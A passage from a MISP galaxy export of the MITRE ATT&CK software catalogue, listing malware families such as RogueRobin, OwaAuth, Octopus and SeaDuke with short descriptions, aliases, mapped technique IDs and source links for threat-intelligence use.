uses: misp-galaxy:mitre-attack-pattern="Environmental Keying - T1480.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Encoding - T1132.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Portable Executable Injection - T1055.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asynchronous Procedure Call - T1055.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"

Table 4715. Table References
Links
https://attack.mitre.org/software/S0260
https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/
https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf

Wiarp - S0206

[Wiarp](https://attack.mitre.org/software/S0206) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Wiarp May 2012)

The tag is: misp-galaxy:mitre-malware="Wiarp - S0206"

Wiarp - S0206 is also known as:

Wiarp

View relationships graph

Wiarp - S0206 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4716. Table References
Links
https://attack.mitre.org/software/S0206
https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf
https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99

OwaAuth - S0072

[OwaAuth](https://attack.mitre.org/software/S0072) is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by [Threat Group-3390](https://attack.mitre.org/groups/G0027). (Citation: Dell TG-3390)

The tag is: misp-galaxy:mitre-malware="OwaAuth - S0072"

OwaAuth - S0072 is also known as:

OwaAuth

View relationships graph

OwaAuth - S0072 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="IIS Components - T1505.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 4717. Table References
Links
https://attack.mitre.org/software/S0072
https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

RogueRobin - S0270

[RogueRobin](https://attack.mitre.org/software/S0270) is a payload used by [DarkHydrus](https://attack.mitre.org/groups/G0079) that has been developed in PowerShell and C#. (Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)

The tag is: misp-galaxy:mitre-malware="RogueRobin - S0270"

RogueRobin - S0270 is also known as:

RogueRobin

View relationships graph

RogueRobin - S0270 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 4718. Table References
Links
https://attack.mitre.org/software/S0270
https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/
https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/

Vasport - S0207

[Vasport](https://attack.mitre.org/software/S0207) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Vasport May 2012)

The tag is: misp-galaxy:mitre-malware="Vasport - S0207"

Vasport - S0207 is also known as:

Vasport

View relationships graph

Vasport - S0207 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 4719. Table References
Links
https://attack.mitre.org/software/S0207
https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf
https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-5938-99

Zeroaccess - S0027

[Zeroaccess](https://attack.mitre.org/software/S0027) is a kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that attempts to add victims to the ZeroAccess botnet, often for monetary gain. (Citation: Sophos ZeroAccess)

The tag is: misp-galaxy:mitre-malware="Zeroaccess - S0027"

Zeroaccess - S0027 is also known as:

Zeroaccess
Trojan.Zeroaccess

View relationships graph

Zeroaccess - S0027 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

Table 4720. Table References
Links
https://attack.mitre.org/software/S0027
https://sophosnews.files.wordpress.com/2012/04/zeroaccess2.pdf

SHIPSHAPE - S0028

[SHIPSHAPE](https://attack.mitre.org/software/S0028) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)

The tag is: misp-galaxy:mitre-malware="SHIPSHAPE - S0028"

SHIPSHAPE - S0028 is also known as:

SHIPSHAPE

View relationships graph

SHIPSHAPE - S0028 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"

Table 4721. Table References
Links
https://attack.mitre.org/software/S0028
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Emissary - S0082

[Emissary](https://attack.mitre.org/software/S0082) is a Trojan that has been used by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It shares code with [Elise](https://attack.mitre.org/software/S0081), with both Trojans being part of a malware group referred to as LStudio. (Citation: Lotus Blossom Dec 2015)

The tag is: misp-galaxy:mitre-malware="Emissary - S0082"

Emissary - S0082 is also known as:

Emissary

View relationships graph

Emissary - S0082 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Group Policy Discovery - T1615" with estimative-language:likelihood-probability="almost-certain"

Table 4722. Table References
Links
https://attack.mitre.org/software/S0082
http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/

MirageFox - S0280

[MirageFox](https://attack.mitre.org/software/S0280) is a remote access tool used against Windows systems. It appears to be an upgraded version of a tool known as Mirage, which is a RAT believed to originate in 2012. (Citation: APT15 Intezer June 2018)

The tag is: misp-galaxy:mitre-malware="MirageFox - S0280"

MirageFox - S0280 is also known as:

MirageFox

View relationships graph

MirageFox - S0280 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 4723. Table References
Links
https://attack.mitre.org/software/S0280
https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/

Pasam - S0208

[Pasam](https://attack.mitre.org/software/S0208) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Pasam May 2012)

The tag is: misp-galaxy:mitre-malware="Pasam - S0208"

Pasam - S0208 is also known as:

Pasam

View relationships graph

Pasam - S0208 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1547.008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 4724. Table References
Links
https://attack.mitre.org/software/S0208
https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf
https://www.symantec.com/security_response/writeup.jsp?docid=2012-050412-4128-99

Darkmoon - S0209

is a rootkit trojan used by Elderwood to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Darkmoon Aug 2005)

Aliases: Darkmoon

The tag is: misp-galaxy:mitre-malware="Darkmoon - S0209"

View relationships graph

Darkmoon - S0209 has relationships with:

similar: misp-galaxy:malpedia="Darkmoon" with estimative-language:likelihood-probability="likely"
revoked-by: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"

Table 4725. Table References
Links
https://attack.mitre.org/software/S0209

Gooligan - S0290

[Gooligan](https://attack.mitre.org/software/S0290) is a malware family that runs privilege escalation exploits on Android devices and then uses its escalated privileges to steal authentication tokens that can be used to access data from many Google applications. [Gooligan](https://attack.mitre.org/software/S0290) has been described as part of the Ghost Push Android malware family. (Citation: Gooligan Citation) (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)

The tag is: misp-galaxy:mitre-malware="Gooligan - S0290"

Gooligan - S0290 is also known as:

Gooligan
Ghost Push

View relationships graph

Gooligan - S0290 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472" with estimative-language:likelihood-probability="almost-certain"

Table 4726. Table References
Links
https://attack.mitre.org/software/S0290
http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/
https://plus.google.com/+AdrianLudwig/posts/GXzJ8vaAFsi
https://blog.lookout.com/blog/2016/12/01/ghost-push-gooligan/

MazarBOT - S0303

[MazarBOT](https://attack.mitre.org/software/S0303) is Android malware that was distributed via SMS in Denmark in 2016. (Citation: Tripwire-MazarBOT)

The tag is: misp-galaxy:mitre-malware="MazarBOT - S0303"

MazarBOT - S0303 is also known as:

MazarBOT

View relationships graph

MazarBOT - S0303 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Carrier Billing Fraud - T1448" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 4727. Table References
Links
https://attack.mitre.org/software/S0303
https://www.tripwire.com/state-of-security/security-data-protection/android-malware-sms/

NetTraveler - S0033

[NetTraveler](https://attack.mitre.org/software/S0033) is malware that has been used in multiple cyber espionage campaigns for basic surveillance of victims. The earliest known samples have timestamps back to 2005, and the largest number of observed samples were created between 2010 and 2013. (Citation: Kaspersky NetTraveler)

The tag is: misp-galaxy:mitre-malware="NetTraveler - S0033"

NetTraveler - S0033 is also known as:

NetTraveler

View relationships graph

NetTraveler - S0033 has relationships with:

similar: misp-galaxy:tool="NetTraveler" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="NetTraveler" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

Table 4728. Table References
Links
https://attack.mitre.org/software/S0033
http://www.securelist.com/en/downloads/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf

BUBBLEWRAP - S0043

[BUBBLEWRAP](https://attack.mitre.org/software/S0043) is a full-featured, second-stage backdoor used by the [admin@338](https://attack.mitre.org/groups/G0018) group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. (Citation: FireEye admin@338)

The tag is: misp-galaxy:mitre-malware="BUBBLEWRAP - S0043"

BUBBLEWRAP - S0043 is also known as:

BUBBLEWRAP
Backdoor.APT.FakeWinHTTPHelper

View relationships graph

BUBBLEWRAP - S0043 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 4729. Table References
Links
https://attack.mitre.org/software/S0043
https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html

NETEAGLE - S0034

[NETEAGLE](https://attack.mitre.org/software/S0034) is a backdoor developed by [APT30](https://attack.mitre.org/groups/G0013) with compile dates as early as 2008. It has two main variants known as “Scout” and “Norton.” (Citation: FireEye APT30)

The tag is: misp-galaxy:mitre-malware="NETEAGLE - S0034"

NETEAGLE - S0034 is also known as:

NETEAGLE

View relationships graph

NETEAGLE - S0034 has relationships with:

similar: misp-galaxy:malpedia="NETEAGLE" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 4730. Table References
Links
https://attack.mitre.org/software/S0034
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Octopus - S0340

[Octopus](https://attack.mitre.org/software/S0340) is a Windows Trojan written in the Delphi programming language that has been used by [Nomadic Octopus](https://attack.mitre.org/groups/G0133) to target government organizations in Central Asia since at least 2014.(Citation: Securelist Octopus Oct 2018)(Citation: Security Affairs DustSquad Oct 2018)(Citation: ESET Nomadic Octopus 2018)

The tag is: misp-galaxy:mitre-malware="Octopus - S0340"

Octopus - S0340 is also known as:

Octopus

View relationships graph

Octopus - S0340 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 4731. Table References
Links
https://attack.mitre.org/software/S0340
https://securelist.com/octopus-infested-seas-of-central-asia/88200/
https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html
https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf

Riltok - S0403

[Riltok](https://attack.mitre.org/software/S0403) is banking malware that uses phishing popups to collect user credentials.(Citation: Kaspersky Riltok June 2019)

The tag is: misp-galaxy:mitre-malware="Riltok - S0403"

Riltok - S0403 is also known as:

Riltok

View relationships graph

Riltok - S0403 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Injection - T1516" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"

Table 4732. Table References
Links
https://attack.mitre.org/software/S0403
https://securelist.com/mobile-banker-riltok/91374/

SPACESHIP - S0035

[SPACESHIP](https://attack.mitre.org/software/S0035) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)

The tag is: misp-galaxy:mitre-malware="SPACESHIP - S0035"

SPACESHIP - S0035 is also known as:

SPACESHIP

View relationships graph

SPACESHIP - S0035 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 4733. Table References
Links
https://attack.mitre.org/software/S0035
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

SeaDuke - S0053

[SeaDuke](https://attack.mitre.org/software/S0053) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2014 to 2015. It was used primarily as a secondary backdoor for victims that were already compromised with [CozyCar](https://attack.mitre.org/software/S0046). (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="SeaDuke - S0053"

SeaDuke - S0053 is also known as:

SeaDuke
SeaDaddy
SeaDesk

View relationships graph

SeaDuke - S0053 has relationships with:

similar: misp-galaxy:malpedia="SEADADDY" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Archive via Library - T1560.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
